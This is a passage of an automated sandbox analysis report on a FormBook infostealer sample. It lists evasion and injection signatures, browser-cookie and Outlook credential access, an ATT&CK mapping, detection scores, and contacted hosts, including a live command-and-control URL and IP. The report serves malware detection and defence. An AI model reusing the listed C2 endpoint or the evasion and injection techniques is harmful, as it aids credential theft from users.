          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01698AA0 mov eax, dword ptr fs:[00000030h]1_2_01698AA0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016E6AA4 mov eax, dword ptr fs:[00000030h]1_2_016E6AA4
          Source: C:\Users\user\Desktop\opp.scr.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          .NET source code references suspicious native API functions
          Source: 0.2.opp.scr.exe.58c0000.4.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
          Source: 0.2.opp.scr.exe.58c0000.4.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
          Source: 0.2.opp.scr.exe.58c0000.4.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtClose: Direct from: 0x76EF2B6C
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\opp.scr.exeMemory written: C:\Users\user\Desktop\opp.scr.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: NULL target: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: NULL target: C:\Windows\SysWOW64\dfrgui.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: NULL target: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: NULL target: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\dfrgui.exeThread APC queued: target process: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess created: C:\Users\user\Desktop\opp.scr.exe "C:\Users\user\Desktop\opp.scr.exe"Jump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeProcess created: C:\Windows\SysWOW64\dfrgui.exe "C:\Windows\SysWOW64\dfrgui.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: oOOsxwAhjIw.exe, 00000008.00000000.2279134113.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, oOOsxwAhjIw.exe, 00000008.00000002.3857635474.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, oOOsxwAhjIw.exe, 0000000A.00000002.3857952120.0000000000FD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: oOOsxwAhjIw.exe, 00000008.00000000.2279134113.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, oOOsxwAhjIw.exe, 00000008.00000002.3857635474.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, oOOsxwAhjIw.exe, 0000000A.00000002.3857952120.0000000000FD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: oOOsxwAhjIw.exe, 00000008.00000000.2279134113.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, oOOsxwAhjIw.exe, 00000008.00000002.3857635474.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, oOOsxwAhjIw.exe, 0000000A.00000002.3857952120.0000000000FD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: oOOsxwAhjIw.exe, 00000008.00000000.2279134113.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, oOOsxwAhjIw.exe, 00000008.00000002.3857635474.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, oOOsxwAhjIw.exe, 0000000A.00000002.3857952120.0000000000FD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\opp.scr.exeQueries volume information: C:\Users\user\Desktop\opp.scr.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.opp.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.opp.scr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3859938760.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2689683266.0000000004130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2689714641.0000000004170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.2393254649.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3858270697.0000000004E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.2399808380.00000000041B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.opp.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.opp.scr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3859938760.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2689683266.0000000004130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2689714641.0000000004170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.2393254649.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3858270697.0000000004E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.2399808380.00000000041B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API          		1
          Registry Run Keys / Startup Folder          		312
          Process Injection          		1
          Masquerading          		1
          OS Credential Dumping          		21
          Security Software Discovery          		Remote Services1
          Email Collection          		11
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		1
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop Protocol11
          Archive Collected Data          		3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Registry Run Keys / Startup Folder          		41
          Virtualization/Sandbox Evasion          		Security Account Manager41
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Data from Local System          		4
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          DLL Side-Loading          		312
          Process Injection          		NTDS13
          System Information Discovery          		Distributed Component Object ModelInput Capture5
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
          Deobfuscate/Decode Files or Information          		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Abuse Elevation Control Mechanism          		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
          Obfuscated Files or Information          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
          Software Packing          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Timestomp          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
          DLL Side-Loading          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435367 Sample: opp.scr.exe Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 34 www.terelprime.com 2->34 36 www.besthomeincome24.com 2->36 50 Snort IDS alert for network traffic 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Antivirus detection for URL or domain 2->54 56 5 other signatures 2->56 10 opp.scr.exe 3 2->10         started        13 chrome.exe 9 2->13         started        signatures3 process4 dnsIp5 68 Injects a PE file into a foreign processes 10->68 16 opp.scr.exe 10->16         started        42 192.168.2.5, 443, 49703, 49705 unknown unknown 13->42 44 192.168.2.23 unknown unknown 13->44 46 239.255.255.250 unknown Reserved 13->46 19 chrome.exe 13->19         started        signatures6 process7 dnsIp8 48 Maps a DLL or memory area into another process 16->48 22 oOOsxwAhjIw.exe 16->22 injected 38 www.google.com 142.251.40.100, 443, 49705, 49706 GOOGLEUS United States 19->38 signatures9 process10 signatures11 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 25 dfrgui.exe 13 22->25         started        process12 signatures13 60 Tries to steal Mail credentials (via file / registry access) 25->60 62 Tries to harvest and steal browser information (history, passwords, etc) 25->62 64 Maps a DLL or memory area into another process 25->64 66 Queues an APC in another process (thread injection) 25->66 28 oOOsxwAhjIw.exe 25->28 injected 32 firefox.exe 25->32         started        process14 dnsIp15 40 www.terelprime.com 66.96.161.166, 49728, 80 BIZLAND-SDUS United States 28->40 70 Found direct / indirect Syscall (likely to bypass EDR) 28->70 signatures16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          opp.scr.exe34%ReversingLabsWin32.Trojan.Generic
          opp.scr.exe46%VirustotalBrowse
          opp.scr.exe100%AviraHEUR/AGEN.1305492
          opp.scr.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          www.terelprime.com4%VirustotalBrowse
          www.besthomeincome24.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.terelprime.com/ufuh/?p80t2Pu=YGhnx96XAVFPN8tv1lUEEiUVdSmZ/iyWteKDUnkDVIOF49Ku923zDENpH5OUCIyJQHomPTwvfF1wQ0t1Y4t+Kv0hk37pk2XOQoNeMFqeOrHvpWJ1tST0YGmxjRv23ozT3g==&B6bX=zjl0100%Avira URL Cloudmalware
          http://www.searchvity.com/0%Avira URL Cloudsafe
          http://www.searchvity.com/?dn=0%Avira URL Cloudsafe
          http://www.searchvity.com/?dn=3%VirustotalBrowse
          http://www.searchvity.com/4%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.google.com
          		142.251.40.100
          		truefalse
            		high
            www.terelprime.com
            		66.96.161.166
            		truetrueunknown
            www.besthomeincome24.com
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://www.google.com/async/ddljson?async=ntp:2false
              		high
              https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                		high
                http://www.terelprime.com/ufuh/?p80t2Pu=YGhnx96XAVFPN8tv1lUEEiUVdSmZ/iyWteKDUnkDVIOF49Ku923zDENpH5OUCIyJQHomPTwvfF1wQ0t1Y4t+Kv0hk37pk2XOQoNeMFqeOrHvpWJ1tST0YGmxjRv23ozT3g==&B6bX=zjl0true
                • Avira URL Cloud: malware
                		unknown
                https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGIS3zrEGIjC0v607c_qYvTi5H8NDS3aYuCJmplAqD5Rl0JeJ4_KibV6kPGTEw6xAv1H63aOy6jsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                  		high
                  https://www.google.com/async/newtab_promosfalse
                    		high
                    https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                      		high
                      https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGIS3zrEGIjAy2SY_wKQfS3Qr9DIp4alnyJkCTUiOIWFLBr4l8U2O7-X7PjrHl9WYNHcJAlxWu-0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://ac.ecosia.org/autocomplete?q=dfrgui.exe, 00000009.00000002.2688193511.0000000000514000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/chrome_newtabdfrgui.exe, 00000009.00000002.2688193511.0000000000514000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/ac/?q=dfrgui.exe, 00000009.00000002.2688193511.0000000000514000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://www.searchvity.com/dfrgui.exe, 00000009.00000002.2690174936.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, oOOsxwAhjIw.exe, 0000000A.00000002.3858719384.0000000002FD6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.3856627290.00000000388B6000.00000004.80000000.00040000.00000000.sdmpfalse
                              • 4%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchdfrgui.exe, 00000009.00000002.2688193511.0000000000514000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=dfrgui.exe, 00000009.00000002.2688193511.0000000000514000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.searchvity.com/?dn=dfrgui.exe, 00000009.00000002.2690174936.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, oOOsxwAhjIw.exe, 0000000A.00000002.3858719384.0000000002FD6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.3856627290.00000000388B6000.00000004.80000000.00040000.00000000.sdmpfalse
                                  • 3%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&commdfrgui.exe, 00000009.00000002.2688193511.0000000000514000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.ecosia.org/newtab/dfrgui.exe, 00000009.00000002.2688193511.0000000000514000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=dfrgui.exe, 00000009.00000002.2688193511.0000000000514000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        142.251.40.100
                                        		www.google.comUnited States
                                        		15169GOOGLEUSfalse
                                        239.255.255.250
                                        		unknownReserved
                                        		unknownunknownfalse
                                        66.96.161.166
                                        		www.terelprime.comUnited States
                                        		29873BIZLAND-SDUStrue

                                        Private

                                        IP
                                        192.168.2.23
                                        192.168.2.5

                                        General Information

                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1435367
                                        Start date and time:2024-05-02 15:55:27 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 9m 47s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Run name:Run with higher sleep bypass
                                        Number of analysed new started processes analysed:11
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:2
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:opp.scr.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@22/10@4/5
                                        EGA Information:
                                        • Successful, ratio: 75%
                                        HCA Information:
                                        • Successful, ratio: 87%
                                        • Number of executed functions: 33
                                        • Number of non-executed functions: 327
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 142.251.40.131, 142.250.80.14, 142.251.167.84, 34.104.35.123, 199.232.214.172, 23.33.40.25, 192.229.211.108, 142.250.65.227, 72.21.81.240, 142.250.65.206
                                        • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
